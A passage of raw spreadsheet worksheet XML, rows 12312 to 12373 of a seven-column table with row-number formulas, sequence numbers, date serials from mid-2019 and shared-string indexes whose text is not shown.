      <c r="A12312">
        <f t="shared" si="192"/>
        <v>12311</v>
      </c>
      <c r="B12312">
        <v>2311</v>
      </c>
      <c r="C12312" t="s">
        <v>19637</v>
      </c>
      <c r="D12312" s="1">
        <v>43668</v>
      </c>
      <c r="E12312" t="s">
        <v>19640</v>
      </c>
      <c r="F12312" t="s">
        <v>9975</v>
      </c>
      <c r="G12312" t="s">
        <v>22483</v>
      </c>
    </row>
    <row r="12313" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12313">
        <f t="shared" si="192"/>
        <v>12312</v>
      </c>
      <c r="B12313">
        <v>2312</v>
      </c>
      <c r="C12313" t="s">
        <v>19637</v>
      </c>
      <c r="D12313" s="1">
        <v>43670</v>
      </c>
      <c r="E12313" t="s">
        <v>19966</v>
      </c>
      <c r="F12313" t="s">
        <v>9978</v>
      </c>
      <c r="G12313" t="s">
        <v>22484</v>
      </c>
    </row>
    <row r="12314" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12314">
        <f t="shared" si="192"/>
        <v>12313</v>
      </c>
      <c r="B12314">
        <v>2313</v>
      </c>
      <c r="C12314" t="s">
        <v>19637</v>
      </c>
      <c r="D12314" s="1">
        <v>43670</v>
      </c>
      <c r="E12314" t="s">
        <v>19705</v>
      </c>
      <c r="F12314" t="s">
        <v>10021</v>
      </c>
      <c r="G12314" t="s">
        <v>22485</v>
      </c>
    </row>
    <row r="12315" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12315">
        <f t="shared" si="192"/>
        <v>12314</v>
      </c>
      <c r="B12315">
        <v>2314</v>
      </c>
      <c r="C12315" t="s">
        <v>19637</v>
      </c>
      <c r="D12315" s="1">
        <v>43675</v>
      </c>
      <c r="E12315" t="s">
        <v>19650</v>
      </c>
      <c r="F12315" t="s">
        <v>10021</v>
      </c>
      <c r="G12315" t="s">
        <v>22486</v>
      </c>
    </row>
    <row r="12316" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12316">
        <f t="shared" si="192"/>
        <v>12315</v>
      </c>
      <c r="B12316">
        <v>2315</v>
      </c>
      <c r="C12316" t="s">
        <v>19637</v>
      </c>
      <c r="D12316" s="1">
        <v>43671</v>
      </c>
      <c r="F12316" t="s">
        <v>10526</v>
      </c>
      <c r="G12316" t="s">
        <v>22487</v>
      </c>
    </row>
    <row r="12317" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12317">
        <f t="shared" si="192"/>
        <v>12316</v>
      </c>
      <c r="B12317">
        <v>2316</v>
      </c>
      <c r="C12317" t="s">
        <v>19637</v>
      </c>
      <c r="D12317" s="1">
        <v>43671</v>
      </c>
      <c r="E12317" t="s">
        <v>22488</v>
      </c>
      <c r="F12317" t="s">
        <v>10526</v>
      </c>
      <c r="G12317" t="s">
        <v>22489</v>
      </c>
    </row>
    <row r="12318" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12318">
        <f t="shared" si="192"/>
        <v>12317</v>
      </c>
      <c r="B12318">
        <v>2317</v>
      </c>
      <c r="C12318" t="s">
        <v>19637</v>
      </c>
      <c r="D12318" s="1">
        <v>43676</v>
      </c>
      <c r="E12318" t="s">
        <v>19750</v>
      </c>
      <c r="F12318" t="s">
        <v>9978</v>
      </c>
      <c r="G12318" t="s">
        <v>22490</v>
      </c>
    </row>
    <row r="12319" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12319">
        <f t="shared" si="192"/>
        <v>12318</v>
      </c>
      <c r="B12319">
        <v>2318</v>
      </c>
      <c r="C12319" t="s">
        <v>19637</v>
      </c>
      <c r="D12319" s="1">
        <v>43675</v>
      </c>
      <c r="E12319" t="s">
        <v>19715</v>
      </c>
      <c r="F12319" t="s">
        <v>10021</v>
      </c>
      <c r="G12319" t="s">
        <v>22491</v>
      </c>
    </row>
    <row r="12320" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12320">
        <f t="shared" si="192"/>
        <v>12319</v>
      </c>
      <c r="B12320">
        <v>2319</v>
      </c>
      <c r="C12320" t="s">
        <v>19637</v>
      </c>
      <c r="D12320" s="1">
        <v>43676</v>
      </c>
      <c r="E12320" t="s">
        <v>19896</v>
      </c>
      <c r="F12320" t="s">
        <v>10021</v>
      </c>
      <c r="G12320" t="s">
        <v>22492</v>
      </c>
    </row>
    <row r="12321" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12321">
        <f t="shared" si="192"/>
        <v>12320</v>
      </c>
      <c r="B12321">
        <v>2320</v>
      </c>
      <c r="C12321" t="s">
        <v>19637</v>
      </c>
      <c r="D12321" s="1">
        <v>43673</v>
      </c>
      <c r="E12321" t="s">
        <v>20813</v>
      </c>
      <c r="F12321" t="s">
        <v>10526</v>
      </c>
      <c r="G12321" t="s">
        <v>22493</v>
      </c>
    </row>
    <row r="12322" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12322">
        <f t="shared" si="192"/>
        <v>12321</v>
      </c>
      <c r="B12322">
        <v>2321</v>
      </c>
      <c r="C12322" t="s">
        <v>19637</v>
      </c>
      <c r="D12322" s="1">
        <v>43674</v>
      </c>
      <c r="E12322" t="s">
        <v>22494</v>
      </c>
      <c r="F12322" t="s">
        <v>9975</v>
      </c>
      <c r="G12322" t="s">
        <v>22495</v>
      </c>
    </row>
    <row r="12323" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12323">
        <f t="shared" si="192"/>
        <v>12322</v>
      </c>
      <c r="B12323">
        <v>2322</v>
      </c>
      <c r="C12323" t="s">
        <v>19637</v>
      </c>
      <c r="D12323" s="1">
        <v>43671</v>
      </c>
      <c r="E12323" t="s">
        <v>19695</v>
      </c>
      <c r="F12323" t="s">
        <v>9975</v>
      </c>
      <c r="G12323" t="s">
        <v>22496</v>
      </c>
    </row>
    <row r="12324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12324">
        <f t="shared" si="192"/>
        <v>12323</v>
      </c>
      <c r="B12324">
        <v>2323</v>
      </c>
      <c r="C12324" t="s">
        <v>19637</v>
      </c>
      <c r="D12324" s="1">
        <v>43671</v>
      </c>
      <c r="E12324" t="s">
        <v>19640</v>
      </c>
      <c r="F12324" t="s">
        <v>9975</v>
      </c>
      <c r="G12324" t="s">
        <v>22497</v>
      </c>
    </row>
    <row r="12325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12325">
        <f t="shared" si="192"/>
        <v>12324</v>
      </c>
      <c r="B12325">
        <v>2324</v>
      </c>
      <c r="C12325" t="s">
        <v>19637</v>
      </c>
      <c r="D12325" s="1">
        <v>43670</v>
      </c>
      <c r="F12325" t="s">
        <v>10526</v>
      </c>
      <c r="G12325" t="s">
        <v>22498</v>
      </c>
    </row>
    <row r="12326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12326">
        <f t="shared" si="192"/>
        <v>12325</v>
      </c>
      <c r="B12326">
        <v>2325</v>
      </c>
      <c r="C12326" t="s">
        <v>19637</v>
      </c>
      <c r="D12326" s="1">
        <v>43668</v>
      </c>
      <c r="E12326" t="s">
        <v>20187</v>
      </c>
      <c r="F12326" t="s">
        <v>9975</v>
      </c>
      <c r="G12326" t="s">
        <v>22499</v>
      </c>
    </row>
    <row r="12327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12327">
        <f t="shared" si="192"/>
        <v>12326</v>
      </c>
      <c r="B12327">
        <v>2326</v>
      </c>
      <c r="C12327" t="s">
        <v>19637</v>
      </c>
      <c r="D12327" s="1">
        <v>43670</v>
      </c>
      <c r="E12327" t="s">
        <v>22488</v>
      </c>
      <c r="F12327" t="s">
        <v>10526</v>
      </c>
      <c r="G12327" t="s">
        <v>22500</v>
      </c>
    </row>
    <row r="12328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12328">
        <f t="shared" si="192"/>
        <v>12327</v>
      </c>
      <c r="B12328">
        <v>2327</v>
      </c>
      <c r="C12328" t="s">
        <v>19637</v>
      </c>
      <c r="D12328" s="1">
        <v>43668</v>
      </c>
      <c r="E12328" t="s">
        <v>19705</v>
      </c>
      <c r="F12328" t="s">
        <v>10021</v>
      </c>
      <c r="G12328" t="s">
        <v>22501</v>
      </c>
    </row>
    <row r="12329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12329">
        <f t="shared" si="192"/>
        <v>12328</v>
      </c>
      <c r="B12329">
        <v>2328</v>
      </c>
      <c r="C12329" t="s">
        <v>19637</v>
      </c>
      <c r="D12329" s="1">
        <v>43670</v>
      </c>
      <c r="E12329" t="s">
        <v>19640</v>
      </c>
      <c r="F12329" t="s">
        <v>10021</v>
      </c>
      <c r="G12329" t="s">
        <v>22502</v>
      </c>
    </row>
    <row r="12330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12330">
        <f t="shared" si="192"/>
        <v>12329</v>
      </c>
      <c r="B12330">
        <v>2329</v>
      </c>
      <c r="C12330" t="s">
        <v>19637</v>
      </c>
      <c r="D12330" s="1">
        <v>43670</v>
      </c>
      <c r="E12330" t="s">
        <v>19640</v>
      </c>
      <c r="F12330" t="s">
        <v>10021</v>
      </c>
      <c r="G12330" t="s">
        <v>22503</v>
      </c>
    </row>
    <row r="12331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12331">
        <f t="shared" si="192"/>
        <v>12330</v>
      </c>
      <c r="B12331">
        <v>2330</v>
      </c>
      <c r="C12331" t="s">
        <v>19637</v>
      </c>
      <c r="D12331" s="1">
        <v>43671</v>
      </c>
      <c r="E12331" t="s">
        <v>22504</v>
      </c>
      <c r="F12331" t="s">
        <v>10526</v>
      </c>
      <c r="G12331" t="s">
        <v>22505</v>
      </c>
    </row>
    <row r="12332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12332">
        <f t="shared" si="192"/>
        <v>12331</v>
      </c>
      <c r="B12332">
        <v>2331</v>
      </c>
      <c r="C12332" t="s">
        <v>19637</v>
      </c>
      <c r="D12332" s="1">
        <v>43673</v>
      </c>
      <c r="E12332" t="s">
        <v>19640</v>
      </c>
      <c r="F12332" t="s">
        <v>10021</v>
      </c>
      <c r="G12332" t="s">
        <v>22506</v>
      </c>
    </row>
    <row r="12333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12333">
        <f t="shared" si="192"/>
        <v>12332</v>
      </c>
      <c r="B12333">
        <v>2332</v>
      </c>
      <c r="C12333" t="s">
        <v>19637</v>
      </c>
      <c r="D12333" s="1">
        <v>43669</v>
      </c>
      <c r="E12333" t="s">
        <v>19650</v>
      </c>
      <c r="F12333" t="s">
        <v>10021</v>
      </c>
      <c r="G12333" t="s">
        <v>22507</v>
      </c>
    </row>
    <row r="12334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12334">
        <f t="shared" si="192"/>
        <v>12333</v>
      </c>
      <c r="B12334">
        <v>2333</v>
      </c>
      <c r="C12334" t="s">
        <v>19637</v>
      </c>
      <c r="D12334" s="1">
        <v>43672</v>
      </c>
      <c r="E12334" t="s">
        <v>19640</v>
      </c>
      <c r="F12334" t="s">
        <v>10021</v>
      </c>
      <c r="G12334" t="s">
        <v>22508</v>
      </c>
    </row>
    <row r="12335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12335">
        <f t="shared" si="192"/>
        <v>12334</v>
      </c>
      <c r="B12335">
        <v>2334</v>
      </c>
      <c r="C12335" t="s">
        <v>19637</v>
      </c>
      <c r="D12335" s="1">
        <v>43676</v>
      </c>
      <c r="E12335" t="s">
        <v>20154</v>
      </c>
      <c r="F12335" t="s">
        <v>10526</v>
      </c>
      <c r="G12335" t="s">
        <v>22509</v>
      </c>
    </row>
    <row r="12336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12336">
        <f t="shared" si="192"/>
        <v>12335</v>
      </c>
      <c r="B12336">
        <v>2335</v>
      </c>
      <c r="C12336" t="s">
        <v>19637</v>
      </c>
      <c r="D12336" s="1">
        <v>43672</v>
      </c>
      <c r="E12336" t="s">
        <v>21524</v>
      </c>
      <c r="F12336" t="s">
        <v>10021</v>
      </c>
      <c r="G12336" t="s">
        <v>22510</v>
      </c>
    </row>
    <row r="12337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12337">
        <f t="shared" si="192"/>
        <v>12336</v>
      </c>
      <c r="B12337">
        <v>2336</v>
      </c>
      <c r="C12337" t="s">
        <v>19637</v>
      </c>
      <c r="D12337" s="1">
        <v>43668</v>
      </c>
      <c r="E12337" t="s">
        <v>20250</v>
      </c>
      <c r="F12337" t="s">
        <v>10021</v>
      </c>
      <c r="G12337" t="s">
        <v>22511</v>
      </c>
    </row>
    <row r="12338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12338">
        <f t="shared" si="192"/>
        <v>12337</v>
      </c>
      <c r="B12338">
        <v>2337</v>
      </c>
      <c r="C12338" t="s">
        <v>19637</v>
      </c>
      <c r="D12338" s="1">
        <v>43672</v>
      </c>
      <c r="F12338" t="s">
        <v>10526</v>
      </c>
      <c r="G12338" t="s">
        <v>22512</v>
      </c>
    </row>
    <row r="12339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12339">
        <f t="shared" si="192"/>
        <v>12338</v>
      </c>
      <c r="B12339">
        <v>2338</v>
      </c>
      <c r="C12339" t="s">
        <v>19637</v>
      </c>
      <c r="D12339" s="1">
        <v>43677</v>
      </c>
      <c r="F12339" t="s">
        <v>10021</v>
      </c>
      <c r="G12339" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="12340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12340">
        <f t="shared" si="192"/>
        <v>12339</v>
      </c>
      <c r="B12340">
        <v>2339</v>
      </c>
      <c r="C12340" t="s">
        <v>19637</v>
      </c>
      <c r="D12340" s="1">
        <v>43675</v>
      </c>
      <c r="E12340" t="s">
        <v>19643</v>
      </c>
      <c r="F12340" t="s">
        <v>10021</v>
      </c>
      <c r="G12340" t="s">
        <v>22513</v>
      </c>
    </row>
    <row r="12341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12341">
        <f t="shared" si="192"/>
        <v>12340</v>
      </c>
      <c r="B12341">
        <v>2340</v>
      </c>
      <c r="C12341" t="s">
        <v>19637</v>
      </c>
      <c r="D12341" s="1">
        <v>43676</v>
      </c>
      <c r="E12341" t="s">
        <v>21796</v>
      </c>
      <c r="F12341" t="s">
        <v>10526</v>
      </c>
      <c r="G12341" t="s">
        <v>22514</v>
      </c>
    </row>
    <row r="12342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12342">
        <f t="shared" si="192"/>
        <v>12341</v>
      </c>
      <c r="B12342">
        <v>2341</v>
      </c>
      <c r="C12342" t="s">
        <v>19637</v>
      </c>
      <c r="D12342" s="1">
        <v>43677</v>
      </c>
      <c r="E12342" t="s">
        <v>21389</v>
      </c>
      <c r="F12342" t="s">
        <v>9975</v>
      </c>
      <c r="G12342" t="s">
        <v>22515</v>
      </c>
    </row>
    <row r="12343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12343">
        <f t="shared" si="192"/>
        <v>12342</v>
      </c>
      <c r="B12343">
        <v>2342</v>
      </c>
      <c r="C12343" t="s">
        <v>19637</v>
      </c>
      <c r="D12343" s="1">
        <v>43672</v>
      </c>
      <c r="E12343" t="s">
        <v>22516</v>
      </c>
      <c r="F12343" t="s">
        <v>10526</v>
      </c>
      <c r="G12343" t="s">
        <v>22517</v>
      </c>
    </row>
    <row r="12344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12344">
        <f t="shared" si="192"/>
        <v>12343</v>
      </c>
      <c r="B12344">
        <v>2343</v>
      </c>
      <c r="C12344" t="s">
        <v>19637</v>
      </c>
      <c r="D12344" s="1">
        <v>43675</v>
      </c>
      <c r="E12344" t="s">
        <v>20167</v>
      </c>
      <c r="F12344" t="s">
        <v>10526</v>
      </c>
      <c r="G12344" t="s">
        <v>22518</v>
      </c>
    </row>
    <row r="12345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12345">
        <f t="shared" si="192"/>
        <v>12344</v>
      </c>
      <c r="B12345">
        <v>2344</v>
      </c>
      <c r="C12345" t="s">
        <v>19637</v>
      </c>
      <c r="D12345" s="1">
        <v>43672</v>
      </c>
      <c r="E12345" t="s">
        <v>22519</v>
      </c>
      <c r="F12345" t="s">
        <v>10021</v>
      </c>
      <c r="G12345" t="s">
        <v>22520</v>
      </c>
    </row>
    <row r="12346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12346">
        <f t="shared" si="192"/>
        <v>12345</v>
      </c>
      <c r="B12346">
        <v>2345</v>
      </c>
      <c r="C12346" t="s">
        <v>19637</v>
      </c>
      <c r="D12346" s="1">
        <v>43670</v>
      </c>
      <c r="E12346" t="s">
        <v>19943</v>
      </c>
      <c r="F12346" t="s">
        <v>9978</v>
      </c>
      <c r="G12346" t="s">
        <v>22521</v>
      </c>
    </row>
    <row r="12347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12347">
        <f t="shared" si="192"/>
        <v>12346</v>
      </c>
      <c r="B12347">
        <v>2346</v>
      </c>
      <c r="C12347" t="s">
        <v>19637</v>
      </c>
      <c r="D12347" s="1">
        <v>43670</v>
      </c>
      <c r="E12347" t="s">
        <v>20005</v>
      </c>
      <c r="F12347" t="s">
        <v>9975</v>
      </c>
      <c r="G12347" t="s">
        <v>22522</v>
      </c>
    </row>
    <row r="12348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12348">
        <f t="shared" si="192"/>
        <v>12347</v>
      </c>
      <c r="B12348">
        <v>2347</v>
      </c>
      <c r="C12348" t="s">
        <v>19637</v>
      </c>
      <c r="D12348" s="1">
        <v>43673</v>
      </c>
      <c r="E12348" t="s">
        <v>19648</v>
      </c>
      <c r="F12348" t="s">
        <v>10021</v>
      </c>
      <c r="G12348" t="s">
        <v>22523</v>
      </c>
    </row>
    <row r="12349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12349">
        <f t="shared" si="192"/>
        <v>12348</v>
      </c>
      <c r="B12349">
        <v>2348</v>
      </c>
      <c r="C12349" t="s">
        <v>19637</v>
      </c>
      <c r="D12349" s="1">
        <v>43669</v>
      </c>
      <c r="E12349" t="s">
        <v>19840</v>
      </c>
      <c r="F12349" t="s">
        <v>10021</v>
      </c>
      <c r="G12349" t="s">
        <v>22524</v>
      </c>
    </row>
    <row r="12350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12350">
        <f t="shared" si="192"/>
        <v>12349</v>
      </c>
      <c r="B12350">
        <v>2349</v>
      </c>
      <c r="C12350" t="s">
        <v>19637</v>
      </c>
      <c r="D12350" s="1">
        <v>43671</v>
      </c>
      <c r="E12350" t="s">
        <v>21322</v>
      </c>
      <c r="F12350" t="s">
        <v>10021</v>
      </c>
      <c r="G12350" t="s">
        <v>22525</v>
      </c>
    </row>
    <row r="12351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12351">
        <f t="shared" si="192"/>
        <v>12350</v>
      </c>
      <c r="B12351">
        <v>2350</v>
      </c>
      <c r="C12351" t="s">
        <v>19637</v>
      </c>
      <c r="D12351" s="1">
        <v>43671</v>
      </c>
      <c r="E12351" t="s">
        <v>22526</v>
      </c>
      <c r="F12351" t="s">
        <v>10526</v>
      </c>
      <c r="G12351" t="s">
        <v>22527</v>
      </c>
    </row>
    <row r="12352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12352">
        <f t="shared" si="192"/>
        <v>12351</v>
      </c>
      <c r="B12352">
        <v>2351</v>
      </c>
      <c r="C12352" t="s">
        <v>19637</v>
      </c>
      <c r="D12352" s="1">
        <v>43675</v>
      </c>
      <c r="E12352" t="s">
        <v>22528</v>
      </c>
      <c r="F12352" t="s">
        <v>10526</v>
      </c>
      <c r="G12352" t="s">
        <v>22529</v>
      </c>
    </row>
    <row r="12353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12353">
        <f t="shared" si="192"/>
        <v>12352</v>
      </c>
      <c r="B12353">
        <v>2352</v>
      </c>
      <c r="C12353" t="s">
        <v>19637</v>
      </c>
      <c r="D12353" s="1">
        <v>43672</v>
      </c>
      <c r="E12353" t="s">
        <v>20047</v>
      </c>
      <c r="F12353" t="s">
        <v>10526</v>
      </c>
      <c r="G12353" t="s">
        <v>21340</v>
      </c>
    </row>
    <row r="12354" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12354">
        <f t="shared" si="192"/>
        <v>12353</v>
      </c>
      <c r="B12354">
        <v>2353</v>
      </c>
      <c r="C12354" t="s">
        <v>19637</v>
      </c>
      <c r="D12354" s="1">
        <v>43668</v>
      </c>
      <c r="E12354" t="s">
        <v>22530</v>
      </c>
      <c r="F12354" t="s">
        <v>10526</v>
      </c>
      <c r="G12354" t="s">
        <v>22531</v>
      </c>
    </row>
    <row r="12355" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12355">
        <f t="shared" ref="A12355:A12418" si="193">+ROW(A12354)</f>
        <v>12354</v>
      </c>
      <c r="B12355">
        <v>2354</v>
      </c>
      <c r="C12355" t="s">
        <v>19637</v>
      </c>
      <c r="D12355" s="1">
        <v>43673</v>
      </c>
      <c r="E12355" t="s">
        <v>19640</v>
      </c>
      <c r="F12355" t="s">
        <v>10021</v>
      </c>
      <c r="G12355" t="s">
        <v>22532</v>
      </c>
    </row>
    <row r="12356" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12356">
        <f t="shared" si="193"/>
        <v>12355</v>
      </c>
      <c r="B12356">
        <v>2355</v>
      </c>
      <c r="C12356" t="s">
        <v>19637</v>
      </c>
      <c r="D12356" s="1">
        <v>43668</v>
      </c>
      <c r="E12356" t="s">
        <v>20253</v>
      </c>
      <c r="F12356" t="s">
        <v>9978</v>
      </c>
      <c r="G12356" t="s">
        <v>22533</v>
      </c>
    </row>
    <row r="12357" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12357">
        <f t="shared" si="193"/>
        <v>12356</v>
      </c>
      <c r="B12357">
        <v>2356</v>
      </c>
      <c r="C12357" t="s">
        <v>19637</v>
      </c>
      <c r="D12357" s="1">
        <v>43670</v>
      </c>
      <c r="E12357" t="s">
        <v>20253</v>
      </c>
      <c r="F12357" t="s">
        <v>9978</v>
      </c>
      <c r="G12357" t="s">
        <v>22534</v>
      </c>
    </row>
    <row r="12358" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12358">
        <f t="shared" si="193"/>
        <v>12357</v>
      </c>
      <c r="B12358">
        <v>2357</v>
      </c>
      <c r="C12358" t="s">
        <v>19637</v>
      </c>
      <c r="D12358" s="1">
        <v>43676</v>
      </c>
      <c r="F12358" t="s">
        <v>10526</v>
      </c>
      <c r="G12358" t="s">
        <v>22535</v>
      </c>
    </row>
    <row r="12359" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12359">
        <f t="shared" si="193"/>
        <v>12358</v>
      </c>
      <c r="B12359">
        <v>2358</v>
      </c>
      <c r="C12359" t="s">
        <v>19637</v>
      </c>
      <c r="D12359" s="1">
        <v>43670</v>
      </c>
      <c r="E12359" t="s">
        <v>19680</v>
      </c>
      <c r="F12359" t="s">
        <v>10021</v>
      </c>
      <c r="G12359" t="s">
        <v>22536</v>
      </c>
    </row>
    <row r="12360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12360">
        <f t="shared" si="193"/>
        <v>12359</v>
      </c>
      <c r="B12360">
        <v>2359</v>
      </c>
      <c r="C12360" t="s">
        <v>19637</v>
      </c>
      <c r="D12360" s="1">
        <v>43668</v>
      </c>
      <c r="E12360" t="s">
        <v>19640</v>
      </c>
      <c r="F12360" t="s">
        <v>9975</v>
      </c>
      <c r="G12360" t="s">
        <v>22537</v>
      </c>
    </row>
    <row r="12361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12361">
        <f t="shared" si="193"/>
        <v>12360</v>
      </c>
      <c r="B12361">
        <v>2360</v>
      </c>
      <c r="C12361" t="s">
        <v>19637</v>
      </c>
      <c r="D12361" s="1">
        <v>43672</v>
      </c>
      <c r="E12361" t="s">
        <v>21389</v>
      </c>
      <c r="F12361" t="s">
        <v>9975</v>
      </c>
      <c r="G12361" t="s">
        <v>22538</v>
      </c>
    </row>
    <row r="12362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12362">
        <f t="shared" si="193"/>
        <v>12361</v>
      </c>
      <c r="B12362">
        <v>2361</v>
      </c>
      <c r="C12362" t="s">
        <v>19637</v>
      </c>
      <c r="D12362" s="1">
        <v>43677</v>
      </c>
      <c r="E12362" t="s">
        <v>22539</v>
      </c>
      <c r="F12362" t="s">
        <v>10021</v>
      </c>
      <c r="G12362" t="s">
        <v>22540</v>
      </c>
    </row>
    <row r="12363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12363">
        <f t="shared" si="193"/>
        <v>12362</v>
      </c>
      <c r="B12363">
        <v>2362</v>
      </c>
      <c r="C12363" t="s">
        <v>19637</v>
      </c>
      <c r="D12363" s="1">
        <v>43673</v>
      </c>
      <c r="E12363" t="s">
        <v>19640</v>
      </c>
      <c r="F12363" t="s">
        <v>9975</v>
      </c>
      <c r="G12363" t="s">
        <v>22541</v>
      </c>
    </row>
    <row r="12364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12364">
        <f t="shared" si="193"/>
        <v>12363</v>
      </c>
      <c r="B12364">
        <v>2363</v>
      </c>
      <c r="C12364" t="s">
        <v>19637</v>
      </c>
      <c r="D12364" s="1">
        <v>43674</v>
      </c>
      <c r="F12364" t="s">
        <v>10021</v>
      </c>
      <c r="G12364" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="12365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12365">
        <f t="shared" si="193"/>
        <v>12364</v>
      </c>
      <c r="B12365">
        <v>2364</v>
      </c>
      <c r="C12365" t="s">
        <v>19637</v>
      </c>
      <c r="D12365" s="1">
        <v>43676</v>
      </c>
      <c r="E12365" t="s">
        <v>22542</v>
      </c>
      <c r="F12365" t="s">
        <v>10526</v>
      </c>
      <c r="G12365" t="s">
        <v>22543</v>
      </c>
    </row>
    <row r="12366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12366">
        <f t="shared" si="193"/>
        <v>12365</v>
      </c>
      <c r="B12366">
        <v>2365</v>
      </c>
      <c r="C12366" t="s">
        <v>19637</v>
      </c>
      <c r="D12366" s="1">
        <v>43676</v>
      </c>
      <c r="F12366" t="s">
        <v>10526</v>
      </c>
      <c r="G12366" t="s">
        <v>22544</v>
      </c>
    </row>
    <row r="12367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12367">
        <f t="shared" si="193"/>
        <v>12366</v>
      </c>
      <c r="B12367">
        <v>2366</v>
      </c>
      <c r="C12367" t="s">
        <v>19637</v>
      </c>
      <c r="D12367" s="1">
        <v>43675</v>
      </c>
      <c r="E12367" t="s">
        <v>21039</v>
      </c>
      <c r="F12367" t="s">
        <v>10021</v>
      </c>
      <c r="G12367" t="s">
        <v>22545</v>
      </c>
    </row>
    <row r="12368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12368">
        <f t="shared" si="193"/>
        <v>12367</v>
      </c>
      <c r="B12368">
        <v>2367</v>
      </c>
      <c r="C12368" t="s">
        <v>19637</v>
      </c>
      <c r="D12368" s="1">
        <v>43675</v>
      </c>
      <c r="E12368" t="s">
        <v>22546</v>
      </c>
      <c r="F12368" t="s">
        <v>9975</v>
      </c>
      <c r="G12368" t="s">
        <v>22547</v>
      </c>
    </row>
    <row r="12369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12369">
        <f t="shared" si="193"/>
        <v>12368</v>
      </c>
      <c r="B12369">
        <v>2368</v>
      </c>
      <c r="C12369" t="s">
        <v>19637</v>
      </c>
      <c r="D12369" s="1">
        <v>43671</v>
      </c>
      <c r="E12369" t="s">
        <v>19640</v>
      </c>
      <c r="F12369" t="s">
        <v>10021</v>
      </c>
      <c r="G12369" t="s">
        <v>22548</v>
      </c>
    </row>
    <row r="12370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12370">
        <f t="shared" si="193"/>
        <v>12369</v>
      </c>
      <c r="B12370">
        <v>2369</v>
      </c>
      <c r="C12370" t="s">
        <v>19637</v>
      </c>
      <c r="D12370" s="1">
        <v>43669</v>
      </c>
      <c r="F12370" t="s">
        <v>10526</v>
      </c>
      <c r="G12370" t="s">
        <v>22549</v>
      </c>
    </row>
    <row r="12371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12371">
        <f t="shared" si="193"/>
        <v>12370</v>
      </c>
      <c r="B12371">
        <v>2370</v>
      </c>
      <c r="C12371" t="s">
        <v>19637</v>
      </c>
      <c r="D12371" s="1">
        <v>43673</v>
      </c>
      <c r="E12371" t="s">
        <v>19750</v>
      </c>
      <c r="F12371" t="s">
        <v>9978</v>
      </c>
      <c r="G12371" t="s">
        <v>22550</v>
      </c>
    </row>
    <row r="12372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12372">
        <f t="shared" si="193"/>
        <v>12371</v>
      </c>
      <c r="B12372">
        <v>2371</v>
      </c>
      <c r="C12372" t="s">
        <v>19637</v>
      </c>
      <c r="D12372" s="1">
        <v>43670</v>
      </c>
      <c r="E12372" t="s">
        <v>19640</v>
      </c>
      <c r="F12372" t="s">
        <v>10021</v>
      </c>
      <c r="G12372" t="s">
        <v>22551</v>
      </c>
    </row>
    <row r="12373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12373">
        <f t="shared" si="193"/>
        <v>12372</v>
      </c>
      <c r="B12373">
        <v>2372</v>
      </c>
      <c r="C12373" t="s">
        <v>19637</v>
      </c>
      <c r="D12373" s="1">
        <v>43677</v>
      </c>
      <c r="E12373" t="s">
        <v>22552</v>
      </c>
      <c r="F12373" t="s">
        <v>10526</v>
      </c>
      <c r="G12373" t="s">
        <v>22553</v>
